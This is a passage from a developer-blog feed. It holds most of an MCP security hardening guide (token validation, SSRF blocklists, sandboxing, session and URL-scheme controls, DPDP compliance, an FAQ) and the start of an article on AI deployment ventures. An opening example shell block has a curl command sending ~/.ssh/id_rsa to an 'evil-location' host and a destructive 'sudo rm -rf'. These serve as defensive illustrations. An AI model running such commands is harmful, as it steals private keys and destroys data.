&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Data exfiltration&lt;/span&gt;
npx malicious-package &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; curl &lt;span class="nt"&gt;-X&lt;/span&gt; POST &lt;span class="nt"&gt;-d&lt;/span&gt; @~/.ssh/id_rsa https://example.com/evil-location

&lt;span class="c"&gt;# Privilege escalation&lt;/span&gt;
&lt;span class="nb"&gt;sudo rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /important/system/files &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"MCP server installed!"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Neither is exotic. Both are what happens when a string in a config file reaches a shell. The specification's stated risks for local MCP servers are arbitrary code execution with client privileges, no user visibility into what runs, command obfuscation, data exfiltration, and irrecoverable data loss.&lt;/p&gt;

&lt;p&gt;The real cost here is usually the trust model, not the code. A team that has internalised "config is data" will keep reintroducing this class of bug no matter how many packages it patches.&lt;/p&gt;

&lt;h2&gt;
  
  
  The configs that stop them
&lt;/h2&gt;

&lt;p&gt;Everything below is drawn from the MCP specification's security best practices document. Where the specification says MUST, treat it as a gate in review, not a suggestion.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Reject any token not issued for your server
&lt;/h3&gt;

&lt;p&gt;Token passthrough, where a server accepts a client's token and forwards it to a downstream API without checking the audience, is forbidden outright. The specification's language: MCP servers MUST NOT accept any tokens that were not explicitly issued for the MCP server.&lt;/p&gt;

&lt;p&gt;The failure modes are worth naming because they are not obvious. Passed-through tokens bypass rate limiting and request validation that depend on audience claims. They break the audit trail, because the downstream resource server's logs show a different identity than the MCP server actually forwarding the call. And they make your server a data exfiltration proxy for anyone holding a stolen token.&lt;/p&gt;

&lt;p&gt;Validate the token against your own authorization server. If you need downstream access, use a token exchange, not a relay.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Block the SSRF ranges before OAuth discovery runs
&lt;/h3&gt;

&lt;p&gt;During OAuth metadata discovery, MCP clients fetch URLs supplied by the server: the &lt;code&gt;resource_metadata&lt;/code&gt; URL from the &lt;code&gt;WWW-Authenticate&lt;/code&gt; header, the &lt;code&gt;authorization_servers&lt;/code&gt; URLs from the Protected Resource Metadata document, and the &lt;code&gt;token_endpoint&lt;/code&gt; and &lt;code&gt;authorization_endpoint&lt;/code&gt; from Authorization Server Metadata. A malicious server populates those with internal addresses.&lt;/p&gt;

&lt;p&gt;The specification recommends blocking these ranges, per RFC 9728 Section 7.7:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight conf"&gt;&lt;code&gt;&lt;span class="c"&gt;# IPv4
&lt;/span&gt;&lt;span class="m"&gt;10&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;/&lt;span class="m"&gt;8&lt;/span&gt;
&lt;span class="m"&gt;172&lt;/span&gt;.&lt;span class="m"&gt;16&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;/&lt;span class="m"&gt;12&lt;/span&gt;
&lt;span class="m"&gt;192&lt;/span&gt;.&lt;span class="m"&gt;168&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;/&lt;span class="m"&gt;16&lt;/span&gt;
&lt;span class="m"&gt;127&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;/&lt;span class="m"&gt;8&lt;/span&gt;          &lt;span class="c"&gt;# except explicit local development
&lt;/span&gt;&lt;span class="m"&gt;169&lt;/span&gt;.&lt;span class="m"&gt;254&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;.&lt;span class="m"&gt;0&lt;/span&gt;/&lt;span class="m"&gt;16&lt;/span&gt;       &lt;span class="c"&gt;# link-local, includes cloud metadata
&lt;/span&gt;
&lt;span class="c"&gt;# IPv6
&lt;/span&gt;&lt;span class="n"&gt;fc00&lt;/span&gt;::/&lt;span class="m"&gt;7&lt;/span&gt;
&lt;span class="n"&gt;fe80&lt;/span&gt;::/&lt;span class="m"&gt;10&lt;/span&gt;
::&lt;span class="m"&gt;1&lt;/span&gt;                  &lt;span class="c"&gt;# except explicit local development
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;169.254.169.254&lt;/code&gt; is the one that costs you the most. It is the AWS, GCP and Azure instance metadata endpoint, and reaching it means IAM credentials leave the building.&lt;/p&gt;

&lt;p&gt;Two cautions from the specification itself. First: avoid implementing IP validation by hand, because attackers use octal, hex and IPv4-mapped IPv6 encodings that custom parsers miss. Second: DNS-based validation has a time-of-check to time-of-use gap, so an attacker domain can resolve to a safe address during validation and an internal one during the request. Pin DNS results between check and use, and put an egress proxy in front of server-side deployments. The specification names Stripe's Smokescreen as an example of a proxy that prevents SSRF by design.&lt;/p&gt;

&lt;p&gt;Enforce HTTPS for OAuth URLs in production, and allow &lt;code&gt;http://&lt;/code&gt; only for loopback during development, consistent with OAuth 2.1 Section 1.5.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Sandbox every local server, and show the command before running it
&lt;/h3&gt;

&lt;p&gt;If your client supports one-click local server configuration, the specification says it MUST implement consent before executing commands. Concretely, the consent dialog must show the exact command without truncation, including arguments, identify it as a potentially dangerous operation that executes code, require explicit approval, and allow cancellation.&lt;/p&gt;

&lt;p&gt;Beyond consent, the specification recommends highlighting dangerous patterns such as &lt;code&gt;sudo&lt;/code&gt;, &lt;code&gt;rm -rf&lt;/code&gt;, network operations and file access outside expected directories; warning that MCP servers run with the same privileges as the client; executing servers in a sandbox with minimal default privileges; and using platform-appropriate sandboxing such as containers or chroot.&lt;/p&gt;

&lt;p&gt;For server authors intending local use: prefer the &lt;code&gt;stdio&lt;/code&gt; transport to limit access to the client alone. If you must use HTTP, require an authorization token or use Unix domain sockets with restricted access.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Bind sessions to user identity, and never authenticate with them
&lt;/h3&gt;

&lt;p&gt;Two rules, both MUST. Servers that implement authorization must verify all inbound requests. Servers must not use sessions for authentication.&lt;/p&gt;

&lt;p&gt;Session IDs must be secure and non-deterministic, generated with a secure random number generator. The specification's concrete recommendation for storage and transport is to combine the session ID with information unique to the authorized user:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;user_id&amp;gt;:&amp;lt;session_id&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The reason is specific. If an attacker guesses a session ID, they still cannot impersonate another user, because the user ID is derived from the verified token rather than supplied by the client. This matters most when you run multiple stateful HTTP servers behind a shared queue, where an attacker can enqueue an event against Server B with a session ID that Server A will later poll and deliver to the client as a resumed response.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Validate OAuth authorization URLs by scheme
&lt;/h3&gt;

&lt;p&gt;Malicious servers supply authorization URLs that clients open. Two things go wrong: a &lt;code&gt;javascript:&lt;/code&gt; URL passed to &lt;code&gt;window.open()&lt;/code&gt; gives the attacker script execution in the client's context, and a URL opened via a shell gives them command injection.&lt;/p&gt;

&lt;p&gt;The specification requires clients to allow only &lt;code&gt;http://&lt;/code&gt; and &lt;code&gt;https://&lt;/code&gt; schemes, with &lt;code&gt;http://&lt;/code&gt; limited to loopback in development, and to reject &lt;code&gt;javascript:&lt;/code&gt;, &lt;code&gt;data:&lt;/code&gt;, &lt;code&gt;file:&lt;/code&gt;, &lt;code&gt;vbscript:&lt;/code&gt; and similar. Use allowlist validation rather than a blocklist. Do not use &lt;code&gt;cmd.exe&lt;/code&gt;, &lt;code&gt;sh&lt;/code&gt; or PowerShell to open URLs; use platform-specific, non-shell mechanisms.&lt;/p&gt;

&lt;p&gt;Web-based clients should set Content Security Policy headers, at minimum &lt;code&gt;script-src 'self'&lt;/code&gt; and &lt;code&gt;default-src 'self'&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This control matters more than it looks, because XSS in a client chains into full compromise wherever a proxy spawns MCP servers as child processes: steal the proxy auth token from the client environment, make an authenticated request to the local proxy, and the proxy spawns your command believing it is a legitimate server.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. Minimise scopes and challenge incrementally
&lt;/h3&gt;

&lt;p&gt;Publishing every scope in &lt;code&gt;scopes_supported&lt;/code&gt; and letting clients request them all is what turns a leaked token into lateral movement. The specification's guidance is a progressive model: start with a minimal set such as &lt;code&gt;mcp:tools-basic&lt;/code&gt; covering low-risk discovery and read operations, then elevate through targeted &lt;code&gt;WWW-Authenticate&lt;/code&gt; challenges carrying &lt;code&gt;scope="..."&lt;/code&gt; when a privileged operation is first attempted.&lt;/p&gt;

&lt;p&gt;The named anti-patterns are worth checking your implementation against: wildcard or omnibus scopes such as &lt;code&gt;*&lt;/code&gt;, &lt;code&gt;all&lt;/code&gt; or &lt;code&gt;full-access&lt;/code&gt;; bundling unrelated privileges to preempt future prompts; returning the entire scope catalogue in every challenge; and treating claimed scopes in a token as sufficient without server-side authorization logic.&lt;/p&gt;

&lt;h2&gt;
  
  
  Control summary
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Specification level&lt;/th&gt;
&lt;th&gt;Config or code change&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Reject foreign-audience tokens&lt;/td&gt;
&lt;td&gt;MUST NOT accept&lt;/td&gt;
&lt;td&gt;Validate audience claim at the server; use token exchange downstream&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block private and link-local IPs&lt;/td&gt;
&lt;td&gt;SHOULD block&lt;/td&gt;
&lt;td&gt;Egress proxy plus RFC 9728 range denylist, DNS pinning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Consent before local server spawn&lt;/td&gt;
&lt;td&gt;MUST implement&lt;/td&gt;
&lt;td&gt;Show untruncated command; require explicit approval&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sandbox spawned servers&lt;/td&gt;
&lt;td&gt;SHOULD implement&lt;/td&gt;
&lt;td&gt;Container or chroot, minimal privileges, restricted filesystem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Non-deterministic session IDs&lt;/td&gt;
&lt;td&gt;MUST use&lt;/td&gt;
&lt;td&gt;Secure RNG; key as &lt;code&gt;&amp;lt;user_id&amp;gt;:&amp;lt;session_id&amp;gt;&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reject dangerous URL schemes&lt;/td&gt;
&lt;td&gt;MUST reject&lt;/td&gt;
&lt;td&gt;Allowlist &lt;code&gt;http&lt;/code&gt;/&lt;code&gt;https&lt;/code&gt; only; no shell URL opening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Minimal initial scopes&lt;/td&gt;
&lt;td&gt;SHOULD implement&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;mcp:tools-basic&lt;/code&gt; baseline; incremental &lt;code&gt;WWW-Authenticate&lt;/code&gt; challenges&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Who owns which control
&lt;/h2&gt;

&lt;p&gt;A recurring source of unpatched risk is that client teams and server teams each assume the other handles a given check. The specification splits them explicitly.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Responsibility&lt;/th&gt;
&lt;th&gt;MCP client&lt;/th&gt;
&lt;th&gt;MCP server&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Token audience validation&lt;/td&gt;
&lt;td&gt;Request correctly scoped tokens&lt;/td&gt;
&lt;td&gt;Reject tokens not issued for it&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSRF protection on discovery URLs&lt;/td&gt;
&lt;td&gt;Blocks private ranges, pins DNS&lt;/td&gt;
&lt;td&gt;Publishes only its own metadata&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Consent before command execution&lt;/td&gt;
&lt;td&gt;Shows exact command, requires approval&lt;/td&gt;
&lt;td&gt;Documents expected startup command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Session security&lt;/td&gt;
&lt;td&gt;Treats session ID as non-secret&lt;/td&gt;
&lt;td&gt;Generates securely, binds to user ID&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URL scheme validation&lt;/td&gt;
&lt;td&gt;Rejects &lt;code&gt;javascript:&lt;/code&gt;, &lt;code&gt;data:&lt;/code&gt;, &lt;code&gt;file:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Supplies only HTTPS authorization URLs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  India-specific considerations
&lt;/h2&gt;

&lt;p&gt;For Indian organisations the MCP question is not only technical. Under the Digital Personal Data Protection Act 2023, failure to maintain reasonable security safeguards attracts a penalty of up to ₹250 crore, and breach notification failures up to ₹200 crore. The Data Protection Board of India was established and the penalty framework became active in November 2025. The Consent Manager Framework becomes operational on 13 November 2026, and full compliance for data fiduciaries lands on 13 May 2027.&lt;/p&gt;

&lt;p&gt;That timeline matters for MCP specifically. An agent with a compromised MCP server has the access the specification warns about: user data, internal databases, API keys, chat histories. If that agent touches personal data of Indian data principals, an RCE is a security-safeguards failure with a defined statutory ceiling, not just an engineering incident. Teams building on MCP through 2026 should treat the STDIO sandbox and the token audience check as part of their DPDP gap assessment, not as backlog items.&lt;/p&gt;

&lt;p&gt;Our reading is that the November 2026 and May 2027 dates give Indian teams a genuine build window, and MCP hardening is cheaper to do now than to retrofit after the Consent Manager integration work starts.&lt;/p&gt;

&lt;p&gt;For the wider picture on Indian data protection timelines, see our guide to &lt;a href="https://ecorpit.com/blog/dpdp-compliance-cost-indian-startups-2027-deadline/" rel="noopener noreferrer"&gt;DPDP compliance costs for Indian startups&lt;/a&gt; and the &lt;a href="https://ecorpit.com/blog/dpdp-consent-manager-framework-readiness-india-2026/" rel="noopener noreferrer"&gt;DPDP consent manager framework readiness checklist&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do this week
&lt;/h2&gt;

&lt;p&gt;A short, ordered list beats a long one nobody finishes.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Inventory every MCP server your organisation runs, local and hosted. The OX Security count of 7,000 publicly accessible servers is a floor, not a ceiling, and most teams underestimate their own footprint.&lt;/li&gt;
&lt;li&gt;Check MCP Inspector versions globally and inside each project's &lt;code&gt;node_modules&lt;/code&gt;. Anything below 0.14.1 is vulnerable. Run &lt;code&gt;npm list -g&lt;/code&gt; and upgrade with &lt;code&gt;npm install -g "@modelcontextprotocol/inspector@^0.14.1"&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Check for mcp-remote between 0.0.5 and 0.1.15. The fix landed in 0.1.16 on 17 June 2025.&lt;/li&gt;
&lt;li&gt;Grep your agent stack for the projects in the CVE table above. LiteLLM, Bisheng and DocsGPT have patches. The rest were unpatched at disclosure on 20 April 2026, so verify current status before you assume.&lt;/li&gt;
&lt;li&gt;Put an egress proxy in front of any server-side MCP client and deny the RFC 9728 ranges, starting with &lt;code&gt;169.254.169.254&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Audit for token passthrough. If any server forwards a client token downstream without validating the audience, that is a specification violation, not a design choice.&lt;/li&gt;
&lt;li&gt;Sandbox local servers. Containers, minimal privileges, restricted filesystem access.&lt;/li&gt;
&lt;li&gt;Block public IP access to MCP services, monitor tool invocations, treat external configuration input as untrusted, and install servers only from verified sources. These four are OX Security's own recommendations.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The pattern across all eight: assume the configuration is hostile and the localhost boundary is imaginary. Both assumptions have already been proven correct by CVE.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What is the root cause of the 2026 MCP CVEs?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The STDIO transport in Anthropic's reference MCP SDK takes a command string from configuration and executes it when spawning a local server. If the command fails to create a STDIO server it still runs, returning an error afterwards. That single design decision propagated into Python, TypeScript, Java and Rust implementations alike.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How many MCP servers are affected?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;OX Security's research published on 20 April 2026 identified more than 7,000 publicly accessible servers and software packages totalling over 150 million downloads. That figure counts internet-reachable instances and package downloads. It does not count private or internal deployments, so the real exposure for most organisations is larger than the published number.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Has Anthropic patched the underlying MCP flaw?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Anthropic declined to modify the protocol's architecture, describing the behaviour as expected, as reported by The Hacker News on 20 April 2026. Individual vendors including LiteLLM, Bisheng and DocsGPT have shipped patches. The shortcoming remains in the reference implementation, so developers inherit the code execution risk directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What was CVE-2025-49596 and is it fixed?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;CVE-2025-49596 was a remote code execution flaw in MCP Inspector, scored CVSS 9.4 and published on 13 June 2025. The proxy on port 6277 had no authentication, so any web page could trigger commands. Anthropic fixed it in version 0.14.1 by adding a default session token and allowed-origins verification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does token passthrough actually break anything?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes, and the specification forbids it. A server that forwards an unvalidated client token bypasses rate limiting and request validation tied to audience claims, breaks the audit trail because downstream logs show the wrong identity, and lets anyone with a stolen token use your server as an exfiltration proxy. Validate audience, then exchange tokens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Which IP ranges should an MCP client block?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Per RFC 9728 Section 7.7, block the private IPv4 ranges 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16, the loopback range 127.0.0.0/8, the link-local range 169.254.0.0/16, and the private IPv6 ranges fc00::/7 and fe80::/10. The link-local range matters most, because 169.254.169.254 is the AWS, GCP and Azure instance metadata endpoint that returns IAM credentials to whoever asks for them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What do the MCP CVEs mean under India's DPDP Act?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Failure to maintain reasonable security safeguards carries a penalty of up to ₹250 crore, with breach notification failures up to ₹200 crore. The penalty framework has been active since November 2025. An MCP remote code execution touching personal data of Indian data principals is a safeguards failure with a defined statutory ceiling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is sandboxing enough on its own?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Sandboxing contains a compromised local server but does nothing about token passthrough, SSRF during OAuth discovery, or session hijacking across multiple stateful HTTP servers. The specification treats these as separate mitigations because they close separate attack paths. Apply the full control set rather than picking one.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT builds and hardens AI agent platforms for teams running MCP in production, covering the controls above as configuration rather than documentation: token audience validation, egress policy, sandboxed local servers, and scope minimisation reviewed against the specification's MUST-level requirements. Our senior engineering teams work across Python, TypeScript and Java implementations, and we design applications aligned with DPDP Act requirements for Indian data fiduciaries. If you are running agents against internal databases and are not certain which of the 11 CVEs above touch your stack, an inventory and gap review is the sensible first step. &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;Talk to us&lt;/a&gt; about an MCP security review.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://thehackernews.com/2026/04/anthropic-mcp-design-vulnerability.html" rel="noopener noreferrer"&gt;Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain&lt;/a&gt; — The Hacker News, 20 April 2026.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://modelcontextprotocol.io/docs/tutorials/security/security_best_practices" rel="noopener noreferrer"&gt;Security Best Practices&lt;/a&gt; — Model Context Protocol specification.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596" rel="noopener noreferrer"&gt;Critical RCE Vulnerability in Anthropic MCP Inspector - CVE-2025-49596&lt;/a&gt; — Oligo Security, 27 June 2025.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49596" rel="noopener noreferrer"&gt;CVE-2025-49596 detail&lt;/a&gt; — NVD, National Institute of Standards and Technology.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/advisories/GHSA-7f8r-222p-6f5g" rel="noopener noreferrer"&gt;MCP Inspector proxy server lacks authentication between the Inspector client and proxy&lt;/a&gt; — GitHub Advisory Database, CVE-2025-49596.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://thehackernews.com/2025/07/critical-mcp-remote-vulnerability.html" rel="noopener noreferrer"&gt;Critical mcp-remote Vulnerability Enables Remote Code Execution, Impacting 437,000+ Downloads&lt;/a&gt; — The Hacker News, July 2025.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/advisories/GHSA-6xpm-ggf7-wc3p" rel="noopener noreferrer"&gt;mcp-remote exposed to OS command injection via untrusted MCP server connections&lt;/a&gt; — GitHub Advisory Database, CVE-2025-6514.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://labs.cloudsecurityalliance.org/research/csa-research-note-mcp-by-design-rce-ox-security-20260420-csa/" rel="noopener noreferrer"&gt;MCP by Design: RCE Across the AI Agent Ecosystem&lt;/a&gt; — Cloud Security Alliance research note on OX Security findings, 20 April 2026.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser" rel="noopener noreferrer"&gt;0.0.0.0 Day: Exploiting Localhost APIs From the Browser&lt;/a&gt; — Oligo Security.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/modelcontextprotocol/inspector" rel="noopener noreferrer"&gt;MCP Inspector repository&lt;/a&gt; — Model Context Protocol, GitHub.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datatracker.ietf.org/doc/html/rfc9728#section-7.7" rel="noopener noreferrer"&gt;OAuth 2.0 Protected Resource Metadata, Section 7.7&lt;/a&gt; — IETF RFC 9728.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.india-briefing.com/news/india-dpdp-compliance-timeline-enforcement-2026-27-44740.html/" rel="noopener noreferrer"&gt;India's DPDP Timeline: Critical Compliance Deadlines for 2026-27&lt;/a&gt; — India Briefing.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://modelcontextprotocol.io/specification/2025-11-25/basic/transports" rel="noopener noreferrer"&gt;MCP Transports specification&lt;/a&gt; — Model Context Protocol.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: 16 July 2026.&lt;/p&gt;

</description>
      <category>mcp</category>
    </item>
    <item>
      <title>Microsoft's $2.5B Frontier bet: who should actually deploy your AI in 2026</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 19:12:37 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/microsofts-25b-frontier-bet-who-should-actually-deploy-your-ai-in-2026-228j</link>
      <guid>https://dev.to/mr_manushukla/microsofts-25b-frontier-bet-who-should-actually-deploy-your-ai-in-2026-228j</guid>
      <description>&lt;h1&gt;
  
  
  Microsoft's $2.5B Frontier bet: who should actually deploy your AI in 2026
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; On July 2, 2026, Microsoft launched Microsoft Frontier Company, backing it with $2.5 billion and 6,000 industry and engineering experts to build and run AI systems inside customers' operations. It was the fifth such commitment in ten weeks. Anthropic announced a joint venture on May 4, 2026 valued at $1.5 billion; OpenAI followed on May 11 with The Deployment Company, which raised more than $4 billion from 19 investors; AWS committed $1 billion around June 30. Accenture, meanwhile, has 80,000 AI and data professionals and reported $11.5 billion in cumulative advanced AI bookings across 11,000 projects before it stopped disclosing the number. The collective bet is that the bottleneck in enterprise AI is no longer the model. It is the deployment. That diagnosis is correct. The buying decision it creates is harder than the vendors are making it sound, because for the first time your implementation partner and your model vendor can be the same company.&lt;/p&gt;

&lt;p&gt;Disclosure before anything else: eCorpIT is a boutique partner. We are one of the options described below, which is exactly why this article gives you the questions to ask rather than an answer. Read the framework, not the recommendation.&lt;/p&gt;

&lt;h2&gt;
  
  
  What actually happened, in ten weeks
&lt;/h2&gt;

&lt;p&gt;Forward-deployed engineering is not new. Palantir built a business on it. What is new is that the model vendors are now doing it themselves, at scale, with balance sheets behind it.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Venture&lt;/th&gt;
&lt;th&gt;Commitment and scale&lt;/th&gt;
&lt;th&gt;Announced&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Frontier Company&lt;/td&gt;
&lt;td&gt;$2.5 billion, 6,000 industry and engineering experts, led by Rodrigo Kede Lima, most recently president of Microsoft Asia. Initial clients include Unilever and Novo Nordisk&lt;/td&gt;
&lt;td&gt;July 2, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS forward deployed engineering&lt;/td&gt;
&lt;td&gt;$1 billion, seeded with "thousands" of FDEs in teams of roughly five or six. Early customers include Southwest Airlines, Cox Automotive, Ricoh, the NBA and the NFL&lt;/td&gt;
&lt;td&gt;June 30, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenAI, The Deployment Company&lt;/td&gt;
&lt;td&gt;Raised over $4 billion from 19 investors, anchored by TPG with Advent International, Bain Capital and Brookfield as co-leads. Acquired consultancy Tomoro and about 150 FDEs&lt;/td&gt;
&lt;td&gt;May 11, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ode with Anthropic&lt;/td&gt;
&lt;td&gt;Valued at $1.5 billion, with a $300 million founding commitment split between Anthropic, Blackstone and Hellman &amp;amp; Friedman. Goldman Sachs a founding partner&lt;/td&gt;
&lt;td&gt;May 4, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Accenture&lt;/td&gt;
&lt;td&gt;80,000 AI and data professionals. $11.5 billion cumulative advanced AI bookings, 11,000 projects, $4.8 billion revenue, advanced AI in 1,300 of 9,000 clients&lt;/td&gt;
&lt;td&gt;Reporting discontinued after Q1 FY2026&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two things stand out. The first is speed: five commitments between May 4 and July 2, 2026. The second is the direction of travel. AWS was the first hyperscaler to move, and Microsoft answered within days with more than double the money.&lt;/p&gt;

&lt;h2&gt;
  
  
  The bottleneck they are all describing is real
&lt;/h2&gt;

&lt;p&gt;The vendors are unusually candid about why they are doing this, and their diagnosis matches what buyers report.&lt;/p&gt;

&lt;p&gt;Anthropic's CFO, Krishna Rao, put the supply problem plainly: "Enterprise demand for Claude is significantly outpacing any single delivery model." Blackstone's president and chief operating officer, Jon Gray, framed the venture as an attack on "one of the most significant bottlenecks to enterprise AI adoption", meaning the scarcity of engineers who can implement frontier systems quickly.&lt;/p&gt;

&lt;p&gt;Accenture's chief executive, Julie Sweet, has been making the same argument from the other side of the table, and her version is the more useful one for a buyer because it names the actual work:&lt;/p&gt;

&lt;p&gt;"Enterprise AI is fundamentally different than consumer AI. Consumer AI adoption is instant. In the enterprise, you can't adopt it unless you have the right security. You've done the right work around processes and most companies have fragmented and siloed processes. You have to have the right data and most companies have mountains of data with a lot of issues in the data, and we call it they have process debt, they have data debt. And of course, they need a modern digital core. And that's why so many companies are still early in the journey."&lt;/p&gt;

&lt;p&gt;Then the number that should shape your budget more than any vendor commitment: Sweet said at least half of Accenture's advanced AI projects also require a data project. Not a model project. A data project.&lt;/p&gt;

&lt;p&gt;That single statistic reframes the whole decision. If half your AI programme is data plumbing, then the question "whose engineers should deploy our AI" is downstream of a bigger one: who is going to fix the data, and do they have any incentive to tell you that the data is the problem?&lt;/p&gt;

&lt;h2&gt;
  
  
  The conflict nobody is putting on the slide
&lt;/h2&gt;

&lt;p&gt;Here is the structural issue with the vendor-led model, stated neutrally.&lt;/p&gt;

